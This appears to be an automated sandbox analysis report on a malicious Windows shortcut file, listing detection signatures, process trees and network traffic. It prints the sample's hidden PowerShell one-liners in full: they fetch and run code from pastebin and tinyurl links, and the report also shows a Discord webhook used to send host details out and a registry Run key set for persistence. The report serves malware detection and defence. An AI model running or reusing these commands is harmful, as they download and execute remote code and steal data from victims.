Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BeginSync lnk.lnk

Overview

General Information

Sample name:BeginSync lnk.lnk
Analysis ID:1534106
MD5:d817cae04c295bad04c61c96556f3c0c
SHA1:554e536e859e078948acc128edb40c889f36c57d
SHA256:a30f3084067e8eb1d503d04281aa27c1088298a3256a5aadf16cfa3ca8f68261
Tags:lnkNeth3Nuser-JAMESWT_MHT
Infos:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Machine Learning detection for sample
Powershell creates an autostart link
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to open files direct via NTFS file id
Connects to a URL shortener service
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • forfiles.exe (PID: 7196 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 7220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7416 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7756 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • attrib.exe (PID: 760 cmdline: "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
  • forfiles.exe (PID: 1120 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 6972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3688 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 2040 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • forfiles.exe (PID: 3108 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 7700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3784 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 5024 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 7756INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x17bf91:$b1: ::WriteAllBytes(
  • 0x18b675:$b1: ::WriteAllBytes(
  • 0x21c727:$b1: ::WriteAllBytes(
  • 0x50c43:$s1: -join
  • 0x541e5:$s1: -join
  • 0x875d3:$s1: -join
  • 0x87790:$s1: -join
  • 0xa276a:$s1: -join
  • 0xa2eca:$s1: -join
  • 0xe5f45:$s1: -join
  • 0xf301a:$s1: -join
  • 0xf63ec:$s1: -join
  • 0xf6a9e:$s1: -join
  • 0xf858f:$s1: -join
  • 0xfa795:$s1: -join
  • 0xfafbc:$s1: -join
  • 0xfb82c:$s1: -join
  • 0xfbf67:$s1: -join
  • 0xfbf99:$s1: -join
  • 0xfbfe1:$s1: -join
  • 0xfc000:$s1: -join
Process Memory Space: powershell.exe PID: 2040INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x12c0ed:$b1: ::WriteAllBytes(
  • 0x198521:$b1: ::WriteAllBytes(
  • 0x852fc:$s1: -join
  • 0x85a5c:$s1: -join
  • 0x14c28a:$s1: -join
  • 0x14ef60:$s1: -join
  • 0x147bf:$s3: reverse
  • 0x1b3f3:$s3: reverse
  • 0x1d464:$s3: reverse
  • 0x28493:$s3: reverse
  • 0x110a8d:$s3: reverse
  • 0x110d7b:$s3: reverse
  • 0x111495:$s3: reverse
  • 0x111c4e:$s3: reverse
  • 0x118e3c:$s3: reverse
  • 0x119256:$s3: reverse
  • 0x119dde:$s3: reverse
  • 0x11aa8b:$s3: reverse
  • 0x167cfe:$s3: reverse
  • 0x17234f:$s3: reverse
  • 0x17d7c3:$s3: reverse
Process Memory Space: powershell.exe PID: 5024INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x671cd:$b1: ::WriteAllBytes(
  • 0x4bdd5:$s1: -join
  • 0x4c535:$s1: -join
  • 0x923f5:$s1: -join
  • 0xa35cc:$s1: -join
  • 0x1d1c9:$s3: reverse
  • 0x28acd:$s3: reverse
  • 0xe494b:$s3: reverse
  • 0xeb57f:$s3: reverse
  • 0xed60c:$s3: reverse
  • 0xf863b:$s3: reverse
  • 0x13978f:$s3: reverse
  • 0x141db0:$s3: reverse
  • 0x4bdb7:$s4: +=
  • 0x4c1d2:$s4: +=
  • 0x4c449:$s4: +=
  • 0x4c517:$s4: +=
  • 0x4d93f:$s4: +=
  • 0x4d9e1:$s4: +=
  • 0x510bb:$s4: +=
  • 0x523e5:$s4: +=

Other

SourceRuleDescriptionAuthorStrings
amsi64_7756.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0xd1f5:$b1: ::WriteAllBytes(
  • 0xb8fa:$s1: -join
  • 0x50a6:$s4: +=
  • 0x5168:$s4: +=
  • 0x938f:$s4: +=
  • 0xb4ac:$s4: +=
  • 0xb796:$s4: +=
  • 0xb8dc:$s4: +=
  • 0xf91f:$s4: +=
  • 0xf99f:$s4: +=
  • 0xfa65:$s4: +=
  • 0xfae5:$s4: +=
  • 0xfcbb:$s4: +=
  • 0xfd3f:$s4: +=
  • 0xd28f:$e4: Get-WmiObject
  • 0xd331:$e4: Get-WmiObject
  • 0xde08:$e4: Get-WmiObject
  • 0xdff7:$e4: Get-Process
  • 0xe04f:$e4: Start-Process
amsi64_2040.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x9a92:$b1: ::WriteAllBytes(
  • 0x8197:$s1: -join
  • 0x1943:$s4: +=
  • 0x1a05:$s4: +=
  • 0x5c2c:$s4: +=
  • 0x7d49:$s4: +=
  • 0x8033:$s4: +=
  • 0x8179:$s4: +=
  • 0xc1bc:$s4: +=
  • 0xc23c:$s4: +=
  • 0xc302:$s4: +=
  • 0xc382:$s4: +=
  • 0xc558:$s4: +=
  • 0xc5dc:$s4: +=
  • 0x9b2c:$e4: Get-WmiObject
  • 0x9bce:$e4: Get-WmiObject
  • 0xa6a5:$e4: Get-WmiObject
  • 0xa894:$e4: Get-Process
  • 0xa8ec:$e4: Start-Process
amsi64_5024.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x9a92:$b1: ::WriteAllBytes(
  • 0x8197:$s1: -join
  • 0x1943:$s4: +=
  • 0x1a05:$s4: +=
  • 0x5c2c:$s4: +=
  • 0x7d49:$s4: +=
  • 0x8033:$s4: +=
  • 0x8179:$s4: +=
  • 0xc1bc:$s4: +=
  • 0xc23c:$s4: +=
  • 0xc302:$s4: +=
  • 0xc382:$s4: +=
  • 0xc558:$s4: +=
  • 0xc5dc:$s4: +=
  • 0x9b2c:$e4: Get-WmiObject
  • 0x9bce:$e4: Get-WmiObject
  • 0xa6a5:$e4: Get-WmiObject
  • 0xa894:$e4: Get-Process
  • 0xa8ec:$e4: Start-Process

Sigma Signatures

System Summary

barindex
Sigma detected: Suspicious PowerShell Parameter Substring
Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)', CommandLine: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)', CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)'", ParentImage: C:\Windows\System32\forfiles.exe, ParentProcessId: 7196, ParentProcessName: forfiles.exe, ProcessCommandLine: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)', ProcessId: 7416, ProcessName: powershell.exe
Sigma detected: CurrentVersion Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7756, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive File Sync
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)', CommandLine: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)', CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)'", ParentImage: C:\Windows\System32\forfiles.exe, ParentProcessId: 7196, ParentProcessName: forfiles.exe, ProcessCommandLine: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)', ProcessId: 7416, ProcessName: powershell.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-15T15:53:52.186365+020028576591A Network Trojan was detected192.168.2.1049711162.159.137.232443TCP
2024-10-15T15:54:08.179140+020028576591A Network Trojan was detected192.168.2.1049720162.159.137.232443TCP
2024-10-15T15:54:16.372817+020028576591A Network Trojan was detected192.168.2.1049722162.159.137.232443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.7% probability
Machine Learning detection for sample
Source: BeginSync lnk.lnkJoe Sandbox ML: detected
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49702 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.10:49704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.10:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49713 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.10:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.10:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.10:49719 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.10:49720 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.10:49722 version: TLS 1.2

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.10:49711 -> 162.159.137.232:443
Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.10:49722 -> 162.159.137.232:443
Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.10:49720 -> 162.159.137.232:443
Connects to a pastebin service (likely for C&C)
Source: unknownDNS query: name: pastebin.com
Source: unknownDNS query: name: pastebin.com
Source: unknownDNS query: name: tinyurl.com
Source: unknownDNS query: name: tinyurl.com
Source: Joe Sandbox ViewIP Address: 104.20.3.235 104.20.3.235
Source: Joe Sandbox ViewIP Address: 104.20.3.235 104.20.3.235
Source: Joe Sandbox ViewIP Address: 162.159.137.232 162.159.137.232
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 294Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 294Connection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 294Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /yeykydun HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: tinyurl.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /yeykydun HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: tinyurl.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: tinyurl.com
Source: global trafficDNS traffic detected: DNS query: pastebin.com
Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
Source: global trafficDNS traffic detected: DNS query: discord.com
Source: unknownHTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 294Connection: Keep-Alive
Source: powershell.exe, 00000004.00000002.1746329088.0000012ACB62B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41F9E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A4C83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://discord.com
Source: powershell.exe, 00000004.00000002.1775607526.0000012ADAF55000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1775607526.0000012ADB098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.1746329088.0000012ACC500000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41EFB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41EF9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41EA48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A422D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A3CDC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A4248000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
Source: powershell.exe, 0000000F.00000002.1991384443.00000246A3CDC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 00000004.00000002.1746329088.0000012ACB105000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.1746329088.0000012ACC578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubuserconte
Source: powershell.exe, 00000004.00000002.1746329088.0000012ACB2AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1746329088.0000012ACC578000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41F062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41F033000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A42F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A42C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
Source: powershell.exe, 0000000F.00000002.1991384443.00000246A42C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: powershell.exe, 00000004.00000002.1746329088.0000012ACB2AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txtQ
Source: powershell.exe, 00000004.00000002.1746329088.0000012ACAEE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41E5C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A37F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.1746329088.0000012ACC167000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1746329088.0000012ACC4DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1746329088.0000012ACB105000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tinyurl.com
Source: powershell.exe, 00000004.00000002.1746329088.0000012ACC167000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1746329088.0000012ACB105000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tinyurl.com/yeykydun
Source: powershell.exe, 00000004.00000002.1746329088.0000012ACB105000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000004.00000002.1746329088.0000012ACB73E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41FB1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A4DB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.discor
